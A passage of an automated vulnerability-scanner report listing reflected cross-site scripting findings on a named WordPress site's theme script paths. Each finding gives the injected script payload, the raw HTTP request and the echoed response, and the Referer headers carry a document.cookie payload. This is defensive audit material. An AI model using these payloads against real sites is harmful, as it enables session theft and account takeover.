User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themesc3d30\"><script>alert(1)</script>d127e7741ba/rt_mynxx_wp/js/rokbox/rokbox.js" type="hidden" />
...[SNIP]...

1.236. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e5e5"><script>alert(1)</script>d1598515b7f was submitted in the REST URL parameter 3. This input was echoed as 3e5e5\"><script>alert(1)</script>d1598515b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp3e5e5"><script>alert(1)</script>d1598515b7f/js/rokbox/rokbox.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp3e5e5\"><script>alert(1)</script>d1598515b7f/js/rokbox/rokbox.js" type="hidden" />
...[SNIP]...

1.237. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb483"><script>alert(1)</script>90adedb165d was submitted in the REST URL parameter 4. This input was echoed as fb483\"><script>alert(1)</script>90adedb165d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/jsfb483"><script>alert(1)</script>90adedb165d/rokbox/rokbox.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:12 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/jsfb483\"><script>alert(1)</script>90adedb165d/rokbox/rokbox.js" type="hidden" />
...[SNIP]...

1.238. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c74c9"><script>alert(1)</script>4edf3969538 was submitted in the REST URL parameter 5. This input was echoed as c74c9\"><script>alert(1)</script>4edf3969538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokboxc74c9"><script>alert(1)</script>4edf3969538/rokbox.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:20 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokboxc74c9\"><script>alert(1)</script>4edf3969538/rokbox.js" type="hidden" />
...[SNIP]...

1.239. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40165"><script>alert(1)</script>d53db6d2961 was submitted in the REST URL parameter 6. This input was echoed as 40165\"><script>alert(1)</script>d53db6d2961 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js40165"><script>alert(1)</script>d53db6d2961 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js40165\"><script>alert(1)</script>d53db6d2961" type="hidden" />
...[SNIP]...

1.240. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bd62"><script>alert(1)</script>03e27be1078 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bd62\"><script>alert(1)</script>03e27be1078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js?4bd62"><script>alert(1)</script>03e27be1078=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js?4bd62\"><script>alert(1)</script>03e27be1078=1" type="hidden" />
...[SNIP]...

1.241. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f1b"><script>alert(1)</script>d214d0ad366 was submitted in the REST URL parameter 1. This input was echoed as d3f1b\"><script>alert(1)</script>d214d0ad366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentd3f1b"><script>alert(1)</script>d214d0ad366/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentd3f1b\"><script>alert(1)</script>d214d0ad366/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.242. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45bbe"><script>alert(1)</script>90a104888c5 was submitted in the REST URL parameter 2. This input was echoed as 45bbe\"><script>alert(1)</script>90a104888c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes45bbe"><script>alert(1)</script>90a104888c5/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes45bbe\"><script>alert(1)</script>90a104888c5/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.243. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dca80"><script>alert(1)</script>8d0a3cd6dd3 was submitted in the REST URL parameter 3. This input was echoed as dca80\"><script>alert(1)</script>8d0a3cd6dd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wpdca80"><script>alert(1)</script>8d0a3cd6dd3/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wpdca80\"><script>alert(1)</script>8d0a3cd6dd3/js/rokbox/themes/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.244. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b28"><script>alert(1)</script>45adaa0beb was submitted in the REST URL parameter 4. This input was echoed as f3b28\"><script>alert(1)</script>45adaa0beb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/jsf3b28"><script>alert(1)</script>45adaa0beb/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:23 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/jsf3b28\"><script>alert(1)</script>45adaa0beb/rokbox/themes/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.245. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e640"><script>alert(1)</script>9f16ced7beb was submitted in the REST URL parameter 5. This input was echoed as 6e640\"><script>alert(1)</script>9f16ced7beb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox6e640"><script>alert(1)</script>9f16ced7beb/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:35 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox6e640\"><script>alert(1)</script>9f16ced7beb/themes/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.246. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7de"><script>alert(1)</script>2ce3c9a591c was submitted in the REST URL parameter 6. This input was echoed as ce7de\"><script>alert(1)</script>2ce3c9a591c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themesce7de"><script>alert(1)</script>2ce3c9a591c/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:56 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themesce7de\"><script>alert(1)</script>2ce3c9a591c/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.247. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d04b"><script>alert(1)</script>3b5c28bd57a was submitted in the REST URL parameter 7. This input was echoed as 4d04b\"><script>alert(1)</script>3b5c28bd57a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx4d04b"><script>alert(1)</script>3b5c28bd57a/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
